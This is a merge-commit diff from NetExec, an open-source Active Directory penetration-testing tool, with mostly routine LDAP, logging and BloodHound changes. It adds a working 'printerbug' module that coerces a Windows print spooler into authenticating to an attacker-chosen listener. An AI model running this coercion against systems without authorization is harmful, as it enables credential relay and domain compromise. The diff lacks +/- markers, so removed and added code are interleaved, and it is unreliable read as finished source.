Merge branch 'main' into neff-ldap-domain

main
Alex 2024-03-24 16:23:13 +01:00 committed by GitHub
commit 09a50d8043
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
23 changed files with 476 additions and 252 deletions

View File

@ -87,8 +87,8 @@ class connection:
self.port = self.args.port
self.conn = None
self.admin_privs = False
self.password = None
self.username = None
self.password = ""
self.username = ""
self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey)
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost

View File

@ -13,7 +13,7 @@ bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
bh_pass = bloodhoundcommunityedition
[Empire]
api_host = 127.0.0.1

View File

@ -52,14 +52,14 @@ def add_user_bh(user, domain, logger, config):
_add_with_domain(user_info, domain, tx, logger)
except AuthError:
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
return
exit()
except ServiceUnavailable:
logger.fail(f"Neo4J does not seem to be available on {uri}.")
return
exit()
except Exception as e:
logger.fail(f"Unexpected error with Neo4J: {e}")
return
driver.close()
finally:
driver.close()
def _add_with_domain(user_info, domain, tx, logger):

View File

@ -16,13 +16,11 @@ class NXCAdapter(logging.LoggerAdapter):
logging.basicConfig(
format="%(message)s",
datefmt="[%X]",
handlers=[
RichHandler(
console=nxc_console,
rich_tracebacks=True,
tracebacks_show_locals=False,
)
],
handlers=[RichHandler(
console=nxc_console,
rich_tracebacks=True,
tracebacks_show_locals=False
)],
)
self.logger = logging.getLogger("nxc")
self.extra = extra
@ -40,30 +38,21 @@ class NXCAdapter(logging.LoggerAdapter):
if self.extra is None:
return f"{msg}", kwargs
if "module_name" in self.extra and len(self.extra["module_name"]) > 8:
if "module_name" in self.extra and len(self.extra["module_name"]) > 11:
self.extra["module_name"] = self.extra["module_name"][:8] + "..."
# If the logger is being called when hooking the 'options' module function
if len(self.extra) == 1 and ("module_name" in self.extra):
return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
kwargs,
)
return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}", kwargs)
# If the logger is being called from nxcServer
if len(self.extra) == 2 and ("module_name" in self.extra) and ("host" in self.extra):
return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
kwargs,
)
return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", kwargs)
# If the logger is being called from a protocol
module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"]) if "module_name" in self.extra else colored(self.extra["protocol"], "blue", attrs=["bold"])
return (
f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
kwargs,
)
return (f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}", kwargs)
def display(self, msg, *args, **kwargs):
"""Display text to console, formatted for nxc"""
@ -104,17 +93,7 @@ class NXCAdapter(logging.LoggerAdapter):
if len(self.logger.handlers):
try:
for handler in self.logger.handlers:
handler.handle(
LogRecord(
"nxc",
20,
"",
kwargs,
msg=text,
args=args,
exc_info=None,
)
)
handler.handle(LogRecord("nxc", 20, "", kwargs, msg=text, args=args, exc_info=None))
except Exception as e:
self.logger.fail(f"Issue while trying to custom print handler: {e}")
else:

View File

@ -35,7 +35,7 @@ class NXCModule:
results = self._detect_installed_services(context, connection, target)
self.detect_running_processes(context, connection, results)
self.dump_results(results, connection.hostname, context)
self.dump_results(results, context)
def _get_target(self, connection):
return connection.host if not connection.kerberos else f"{connection.hostname}.{connection.domain}"
@ -58,18 +58,16 @@ class NXCModule:
dce, _ = lsa.connect()
policyHandle = lsa.open_policy(dce)
try:
for product in conf["products"]:
for service in product["services"]:
for product in conf["products"]:
for service in product["services"]:
try:
lsa.LsarLookupNames(dce, policyHandle, service["name"])
context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
results.setdefault(product["name"], {"services": []})["services"].append(service)
except Exception:
pass
except Exception:
pass
except Exception as e:
context.log.fail(str(e))
return results
def detect_running_processes(self, context, connection, results):
@ -80,13 +78,16 @@ class NXCModule:
for product in conf["products"]:
for pipe in product["pipes"]:
if pathlib.PurePath(fl).match(pipe["name"]):
context.log.debug(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
context.log.info(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
prod_results = results.setdefault(product["name"], {})
prod_results.setdefault("pipes", []).append(pipe)
except Exception as e:
context.log.debug(str(e))
if "STATUS_ACCESS_DENIED" in str(e):
context.log.fail("Error STATUS_ACCESS_DENIED while enumerating pipes, probably due to using SMBv1")
else:
context.log.fail(str(e))
def dump_results(self, results, remoteName, context):
def dump_results(self, results, context):
if not results:
context.log.highlight("Found NOTHING!")
return
@ -261,7 +262,10 @@ conf = {
{"name": "epfw", "description": "ESET"},
{"name": "epfwlwf", "description": "ESET"},
{"name": "epfwwfp", "description": "ESET"},
{"name": "EraAgentSvc", "description": "ESET"},
{"name": "EraAgentSvc", "description": "ESET Management Agent service"},
{"name": "ERAAgent", "description": "ESET Management Agent service"},
{"name": "efwd", "description": "ESET Communication Forwarding Service"},
{"name": "ehttpsrv", "description": "ESET HTTP Server"},
],
"pipes": [{"name": "nod_scriptmon_pipe", "processes": [""]}],
},

View File

@ -146,7 +146,7 @@ class NXCModule:
@staticmethod
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
host_id = context.db.get_computers(connection.host)[0][0]
host_id = context.db.get_hosts(connection.host)[0][0]
if password is not None:
credential_type = "plaintext"
else:

View File

@ -39,10 +39,15 @@ class NXCModule:
async def run_ldaps_noEPA(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect()
# Required step to try to bind without channel binding
ldapsClientConn.cb_data = None
if err is not None:
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
sys.exit()
_, err = await ldapsClientConn.bind()
valid, err = await ldapsClientConn.bind()
if "data 80090346" in str(err):
return True # channel binding IS enforced
elif "data 52e" in str(err):
@ -114,19 +119,30 @@ class NXCModule:
# requirements are enforced based on potential errors
# during the bind attempt.
async def run_ldap(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect()
if err is None:
_, err = await ldapsClientConn.bind()
if "stronger" in str(err):
return True # because LDAP server signing requirements ARE enforced
elif ("data 52e") in str(err):
context.log.fail("Not connected... exiting")
sys.exit()
elif err is None:
try:
ldapsClientConn = MSLDAPClientConnection(target, credential)
ldapsClientConn._disable_signing = True
_, err = await ldapsClientConn.connect()
if err is not None:
context.log.fail(str(err))
return False
else:
context.log.fail(str(err))
_, err = await ldapsClientConn.bind()
if err is not None:
errstr = str(err).lower()
if "stronger" in errstr:
return True
# because LDAP server signing requirements ARE enforced
else:
context.log.fail(str(err))
else:
# LDAPS bind successful
return False
# because LDAP server signing requirements are not enforced
except Exception as e:
context.log.debug(str(e))
return False
# Run trough all our code blocks to determine LDAP signing and channel binding settings.
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
@ -148,9 +164,8 @@ class NXCModule:
stype=stype,
)
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
target = MSLDAPTarget(connection.host, 389, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapIsProtected = asyncio.run(run_ldap(target, credential))
if ldapIsProtected is False:
context.log.highlight("LDAP Signing NOT Enforced!")
elif ldapIsProtected is True:
@ -162,7 +177,7 @@ class NXCModule:
if DoesLdapsCompleteHandshake(connection.host) is True:
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True:
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')

117
nxc/modules/printerbug.py Normal file
View File

@ -0,0 +1,117 @@
from impacket.dcerpc.v5 import transport, rprn
class NXCModule:
    """Check whether a target's print spooler can be coerced via PrinterBug.

    Set the LISTENER option to an attacker-controlled address to make the
    target authenticate back to it.
    """

    name = "printerbug"
    description = "Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion."
    supported_protocols = ["smb"]
    opsec_safe = True
    multiple_hosts = True

    def __init__(self, context=None, module_options=None):
        self.context = context
        self.module_options = module_options
        self.listener = None

    def options(self, context, module_options):
        """LISTENER Listener Address (defaults to 127.0.0.1)"""
        # Fall back to localhost when the operator did not supply a listener.
        self.listener = module_options.get("LISTENER", "127.0.0.1")

    def on_login(self, context, connection):
        trigger = TriggerAuth(context)
        # Kerberos needs the FQDN; NTLM can use the raw host address.
        target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
        dce = trigger.connect(
            username=connection.username,
            password=connection.password,
            domain=connection.domain,
            lmhash=connection.lmhash,
            nthash=connection.nthash,
            target=target,
            doKerberos=connection.kerberos,
            dcHost=connection.kdcHost,
            aesKey=connection.aesKey,
        )
        if dce is None:
            context.log.debug("Target is not vulnerable to PrinterBug")
            return
        context.log.debug("Target is vulnerable to PrinterBug")
        trigger.RpcRemoteFindFirstPrinterChange(dce, self.listener, target)
        context.log.highlight("VULNERABLE")
        dce.disconnect()
################################################################################
# RPC CALLS
################################################################################
class TriggerAuth:
    """Wraps the MS-RPRN (print spooler) RPC calls used to trigger PrinterBug coercion."""

    def __init__(self, context):
        self.context = context

    def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):
        """Open and bind a DCERPC connection to \\PIPE\\spoolss on *target*.

        Returns the bound DCE/RPC object, or None when connecting or binding fails.
        """
        rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\spoolss]" % target)
        rpctransport.set_dport(445)
        if hasattr(rpctransport, "set_credentials"):
            rpctransport.set_credentials(
                username=username,
                password=password,
                domain=domain,
                lmhash=lmhash,
                nthash=nthash,
                aesKey=aesKey,
            )
        if doKerberos:
            rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
        rpctransport.setRemoteHost(target)
        dce = rpctransport.get_dce_rpc()
        # Fixed: the original built this message with .format() (leaving the %s
        # untouched) and applied % afterwards, and it logged the wrong pipe name
        # ("spoolfs" instead of "spoolss").
        self.context.log.debug("Connecting to {}".format(r"ncacn_np:%s[\PIPE\spoolss]" % target))
        try:
            dce.connect()
        except Exception as e:
            self.context.log.debug(f"Something went wrong, check error status => {e!s}")
            return None
        try:
            dce.bind(rprn.MSRPC_UUID_RPRN)
        except Exception as e:
            self.context.log.debug(f"Something went wrong, check error status => {e!s}")
            return None
        self.context.log.debug("Successfully bound!")
        return dce

    def RpcRemoteFindFirstPrinterChange(self, dce, listener, target):
        """Send RpcRemoteFindFirstPrinterChangeNotificationEx so the target's
        spooler authenticates back to *listener*.
        """
        self.context.log.debug("Sending RpcRemoteFindFirstPrinterChange!")
        try:
            resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
        except Exception as e:
            if "Broken pipe" in str(e):
                # The connection timed-out. Let's try to bring it back next round
                self.context.log.error("Connection failed - skipping host!")
                return
            elif "ACCESS_DENIED" in str(e).upper():
                # Fixed: the original tested `str(e).upper().find("ACCESS_DENIED")`,
                # which is truthy even when the substring is absent (find() returns -1),
                # so every non-"Broken pipe" error was misreported as access denied.
                # We're not admin, bye
                self.context.log.error("Access denied - RPC call was denied")
                dce.disconnect()
                return
            else:
                raise
        self.context.log.debug("Got handle")
        try:
            request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
            request["hPrinter"] = resp["pHandle"]
            request["fdwFlags"] = rprn.PRINTER_CHANGE_ADD_JOB
            request["pszLocalMachine"] = "\\\\%s\x00" % listener
        except Exception as e:
            self.context.log.debug(e)
        try:
            dce.request(request)
        except Exception as e:
            self.context.log.debug(e)

View File

@ -1,92 +1,111 @@
from dateutil.relativedelta import relativedelta as rd
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from math import fabs
class NXCModule:
"""
Created by fplazar and wanetty
Module by @gm_eduard and @ferranplaza
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py
"""
Initial FGPP/PSO script written by @n00py: https://github.com/n00py/GetFGPP
Module by @_sandw1ch
"""
name = "pso"
description = "Query to get PSO from LDAP"
description = "Module to get the Fine Grained Password Policy/PSOs"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = True
multiple_hosts = False
pso_fields = [
"cn",
"msDS-PasswordReversibleEncryptionEnabled",
"msDS-PasswordSettingsPrecedence",
"msDS-MinimumPasswordLength",
"msDS-PasswordHistoryLength",
"msDS-PasswordComplexityEnabled",
"msDS-LockoutObservationWindow",
"msDS-LockoutDuration",
"msDS-LockoutThreshold",
"msDS-MinimumPasswordAge",
"msDS-MaximumPasswordAge",
"msDS-PSOAppliesTo",
]
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
def options(self, context, module_options):
"""No options available."""
def convert_time_field(self, field, value):
time_fields = {"msDS-LockoutObservationWindow": (60, "mins"), "msDS-MinimumPasswordAge": (86400, "days"), "msDS-MaximumPasswordAge": (86400, "days"), "msDS-LockoutDuration": (60, "mins")}
if field in time_fields:
value = f"{int(fabs(float(value)) / (10000000 * time_fields[field][0]))} {time_fields[field][1]}"
return value
def on_login(self, context, connection):
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
# Building the search filter
search_filter = "(objectClass=msDS-PasswordSettings)"
# Are there even any FGPPs?
context.log.success("Attempting to enumerate policies...")
resp = connection.ldapConnection.search(searchBase=f"CN=Password Settings Container,CN=System,{''.join([f'DC={dc},' for dc in connection.domain.split('.')]).rstrip(',')}", searchFilter="(objectclass=*)")
if len(resp) > 1:
context.log.highlight(f"{len(resp) - 1} PSO Objects found!")
context.log.highlight("")
context.log.success("Attempting to enumerate objects with an applied policy...")
try:
context.log.debug(f"Search Filter={search_filter}")
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=self.pso_fields, sizeLimit=0)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
else:
context.log.debug(e)
return False
pso_list = []
context.log.debug(f"Total of records returned {len(resp)}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
# Who do they apply to?
resp = connection.search(searchFilter="(objectclass=*)", attributes=["DistinguishedName", "msDS-PSOApplied"])
for attrs in resp:
if isinstance(attrs, ldapasn1_impacket.SearchResultEntry) is not True:
continue
for attr in attrs["attributes"]:
if str(attr["type"]) in "msDS-PSOApplied":
context.log.highlight(f"Object: {attrs['objectName']}")
context.log.highlight("Applied Policy: ")
for value in attr["vals"]:
context.log.highlight(f"\t{value}")
context.log.highlight("")
pso_info = {}
# Let's find out even more details!
context.log.success("Attempting to enumerate details...\n")
resp = connection.search(searchFilter="(objectclass=msDS-PasswordSettings)",
attributes=["name", "msds-lockoutthreshold", "msds-psoappliesto", "msds-minimumpasswordlength",
"msds-passwordhistorylength", "msds-lockoutobservationwindow", "msds-lockoutduration",
"msds-passwordsettingsprecedence", "msds-passwordcomplexityenabled", "Description",
"msds-passwordreversibleencryptionenabled", "msds-minimumpasswordage", "msds-maximumpasswordage"])
for attrs in resp:
if not isinstance(attrs, ldapasn1_impacket.SearchResultEntry):
continue
policyName, description, passwordLength, passwordhistorylength, lockoutThreshold, obersationWindow, lockoutDuration, complexity, minPassAge, maxPassAge, reverseibleEncryption, precedence, policyApplies = ("",) * 13
for attr in attrs["attributes"]:
if str(attr["type"]) == "name":
policyName = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutThreshold":
lockoutThreshold = attr["vals"][0]
elif str(attr["type"]) == "msDS-MinimumPasswordLength":
passwordLength = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordHistoryLength":
passwordhistorylength = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutObservationWindow":
observationWindow = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutDuration":
lockoutDuration = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordSettingsPrecedence":
precedence = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordComplexityEnabled":
complexity = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordReversibleEncryptionEnabled":
reverseibleEncryption = attr["vals"][0]
elif str(attr["type"]) == "msDS-MinimumPasswordAge":
minPassAge = attr["vals"][0]
elif str(attr["type"]) == "msDS-MaximumPasswordAge":
maxPassAge = attr["vals"][0]
elif str(attr["type"]) == "description":
description = attr["vals"][0]
elif str(attr["type"]) == "msDS-PSOAppliesTo":
policyApplies = ""
for value in attr["vals"]:
policyApplies += f"{value};"
context.log.highlight(f"Policy Name: {policyName}")
if description:
context.log.highlight(f"Description: {description}")
context.log.highlight(f"Minimum Password Length: {passwordLength}")
context.log.highlight(f"Minimum Password History Length: {passwordhistorylength}")
context.log.highlight(f"Lockout Threshold: {lockoutThreshold}")
context.log.highlight(f"Observation Window: {mins(observationWindow)}")
context.log.highlight(f"Lockout Duration: {mins(lockoutDuration)}")
context.log.highlight(f"Complexity Enabled: {complexity}")
context.log.highlight(f"Minimum Password Age: {days(minPassAge)}")
context.log.highlight(f"Maximum Password Age: {days(maxPassAge)}")
context.log.highlight(f"Reversible Encryption: {reverseibleEncryption}")
context.log.highlight(f"Precedence: {precedence} (Lower is Higher Priority)")
context.log.highlight("Policy Applies to:")
for value in str(policyApplies)[:-1].split(";"):
if value:
context.log.highlight(f"\t{value}")
context.log.highlight("")
try:
for attribute in item["attributes"]:
attr_name = str(attribute["type"])
if attr_name in self.pso_fields:
pso_info[attr_name] = attribute["vals"][0]._value.decode("utf-8")
pso_list.append(pso_info)
def days(ldap_time):
    """Convert an AD interval (100-nanosecond units, typically negative) to a whole-day string.

    Uses explicit integer arithmetic for the *total* number of days instead of
    relativedelta, whose normalized components are only correct here by accident
    (and whose .minutes sibling is outright wrong — see mins()).
    """
    total_seconds = abs(int(ldap_time)) // 10000000  # 100-ns ticks -> seconds
    return f"{total_seconds // 86400} days"
except Exception as e:
context.log.debug("Exception:", exc_info=True)
context.log.debug(f"Skipping item, cannot process due to error {e}")
if len(pso_list) > 0:
context.log.success("Password Settings Objects (PSO) found:")
for pso in pso_list:
for field in self.pso_fields:
if field in pso:
value = self.convert_time_field(field, pso[field])
context.log.highlight(f"{field}: {value}")
context.log.highlight("-----")
else:
context.log.info("No Password Settings Objects (PSO) found.")
def mins(ldap_time):
    """Convert an AD interval (100-nanosecond units, typically negative) to a total-minutes string.

    Bug fix: the original returned relativedelta(...).minutes, which is the
    normalized 0-59 minute *component* — hours and days were silently dropped,
    so e.g. a 90-minute observation window was reported as "30 minutes".
    """
    total_seconds = abs(int(ldap_time)) // 10000000  # 100-ns ticks -> seconds
    return f"{total_seconds // 60} minutes"

View File

@ -79,6 +79,7 @@ def main():
else:
nxc_logger.logger.setLevel(logging.ERROR)
root_logger.setLevel(logging.ERROR)
logging.getLogger("neo4j").setLevel(logging.ERROR)
# if these are the same, it might double log to file (two FileHandlers will be added)
# but this should never happen by accident

View File

@ -0,0 +1,13 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket
def parse_result_attributes(ldap_response):
    """Flatten an impacket LDAP search response into a list of attribute dicts.

    Each SearchResultEntry becomes a {attribute_name: first_value} mapping;
    SearchResultReference items interleaved in the response are skipped.
    Note: only the first value of a multi-valued attribute is kept.
    """
    parsed = []
    for item in ldap_response:
        # SearchResultReferences may be returned
        if not isinstance(item, ldapasn1_impacket.SearchResultEntry):
            continue
        parsed.append({str(attr["type"]): str(attr["vals"][0]) for attr in item["attributes"]})
    return parsed

View File

@ -5,7 +5,7 @@ import hmac
import os
import socket
from binascii import hexlify
from datetime import datetime
from datetime import datetime, timedelta
from re import sub, I
from zipfile import ZipFile
from termcolor import colored
@ -38,6 +38,7 @@ from nxc.logger import NXCAdapter, nxc_logger
from nxc.protocols.ldap.bloodhound import BloodHound
from nxc.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
from nxc.protocols.ldap.kerberos import KerberosAttacks
from nxc.parsers.ldap_results import parse_result_attributes
ldap_error_status = {
"1": "STATUS_NOT_SUPPORTED",
@ -287,7 +288,7 @@ class ldap(connection):
# Re-connect since we logged off
self.create_conn_obj()
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}".replace(":", "-"))
def print_host_info(self):
self.logger.debug("Printing host info for LDAP")
@ -370,12 +371,11 @@ class ldap(connection):
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -432,7 +432,7 @@ class ldap(connection):
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -488,7 +488,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -516,7 +516,7 @@ class ldap(connection):
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -582,7 +582,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -609,7 +609,7 @@ class ldap(connection):
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -751,37 +751,51 @@ class ldap(connection):
return False
def users(self):
# Building the search filter
search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
attributes = [
"sAMAccountName",
"description",
"badPasswordTime",
"badPwdCount",
"pwdLastSet",
]
"""
Retrieves user information from the LDAP server.
Args:
----
input_attributes (list): Optional. List of attributes to retrieve for each user.
Returns:
-------
None
"""
if len(self.args.users) > 0:
self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
search_filter = f"(|{''.join(f'(sAMAccountName={user})' for user in self.args.users)})"
else:
self.logger.debug("Trying to dump all users")
search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
# default to these attributes to mirror the SMB --users functionality
request_attributes = ["sAMAccountName", "description", "badPwdCount", "pwdLastSet"]
resp = self.search(search_filter, request_attributes, sizeLimit=0)
resp = self.search(search_filter, attributes, sizeLimit=0)
if resp:
self.logger.display(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
description = ""
try:
if self.username == "":
self.logger.highlight(f"{item['objectName']}")
else:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
elif str(attribute["type"]) == "description":
description = str(attribute["vals"][0])
self.logger.highlight(f"{sAMAccountName:<30} {description}")
except Exception as e:
self.logger.debug(f"Skipping item, cannot process due to error {e}")
return
# I think this was here for anonymous ldap bindings, so I kept it, but we might just want to remove it
if self.username == "":
self.logger.display(f"Total records returned: {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
self.logger.highlight(f"{item['objectName']}")
return
users = parse_result_attributes(resp)
# we print the total records after we parse the results since often SearchResultReferences are returned
self.logger.display(f"Total records returned: {len(users):d}")
self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
for user in users:
# TODO: functionize this - we do this calculation in a bunch of places, different, including in the `pso` module
timestamp_seconds = int(user.get("pwdLastSet", "")) / 10**7
start_date = datetime(1601, 1, 1)
parsed_pw_last_set = (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")
if parsed_pw_last_set == "1601-01-01 00:00:00":
parsed_pw_last_set = "<never>"
# we default attributes to blank strings if they don't exist in the dict
self.logger.highlight(f"{user.get('sAMAccountName', ''):<30}{parsed_pw_last_set:<20}{user.get('badPwdCount', ''):<8}{user.get('description', ''):<60}")
def groups(self):
# Building the search filter
@ -851,7 +865,7 @@ class ldap(connection):
elif str(attribute["type"]) == "userAccountControl":
userAccountControl = int(attribute["vals"][0])
account_disabled = userAccountControl & 2
if not account_disabled:
if not account_disabled:
self.logger.highlight(f"{sAMAccountName}")
except Exception as e:
self.logger.debug(f"Skipping item, cannot process due to error {e}")
@ -1373,15 +1387,18 @@ class ldap(connection):
num_workers=10,
disable_pooling=False,
timestamp=timestamp,
fileNamePrefix=self.output_filename.split("/")[-1],
computerfile=None,
cachefile=None,
exclude_dcs=False,
)
self.output_filename += f"_{timestamp}"
self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip")
list_of_files = os.listdir(os.getcwd())
with ZipFile(self.output_filename + "bloodhound.zip", "w") as z:
for each_file in list_of_files:
if each_file.startswith(timestamp) and each_file.endswith("json"):
if each_file.startswith(self.output_filename.split("/")[-1]) and each_file.endswith("json"):
z.write(each_file)
os.remove(each_file)

View File

@ -44,17 +44,7 @@ class BloodHound:
# Create an object resolver
self.ad.create_objectresolver(self.pdc)
def run(
self,
collect,
num_workers=10,
disable_pooling=False,
timestamp="",
computerfile="",
cachefile=None,
exclude_dcs=False,
):
def run(self, collect, num_workers=10, disable_pooling=False, timestamp="", fileNamePrefix="", computerfile="", cachefile=None, exclude_dcs=False):
start_time = time.time()
if cachefile:
self.ad.load_cachefile(cachefile)
@ -82,7 +72,7 @@ class BloodHound:
)
# Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.enumerate_memberships(timestamp=timestamp)
membership_enum.enumerate_memberships(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
elif "container" in collect:
# Fetch domains for later, computers if needed
self.pdc.prefetch_info(
@ -92,7 +82,7 @@ class BloodHound:
)
# Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.do_container_collection(timestamp=timestamp)
membership_enum.do_container_collection(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
elif do_computer_enum:
# We need to know which computers to query regardless
# We also need the domains to have a mapping from NETBIOS -> FQDN for local admins
@ -102,7 +92,7 @@ class BloodHound:
self.pdc.get_domains("acl" in collect)
if "trusts" in collect or "acl" in collect or "objectprops" in collect:
trusts_enum = DomainEnumerator(self.ad, self.pdc)
trusts_enum.dump_domain(collect, timestamp=timestamp)
trusts_enum.dump_domain(collect, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
if do_computer_enum:
# If we don't have a GC server, don't use it for deconflictation
have_gc = len(self.ad.gcs()) > 0
@ -114,7 +104,7 @@ class BloodHound:
computerfile=computerfile,
exclude_dcs=exclude_dcs,
)
computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp)
computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
end_time = time.time()
minutes, seconds = divmod(int(end_time - start_time), 60)
self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds))

View File

@ -16,7 +16,7 @@ def proto_args(parser, std_parser, module_parser):
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
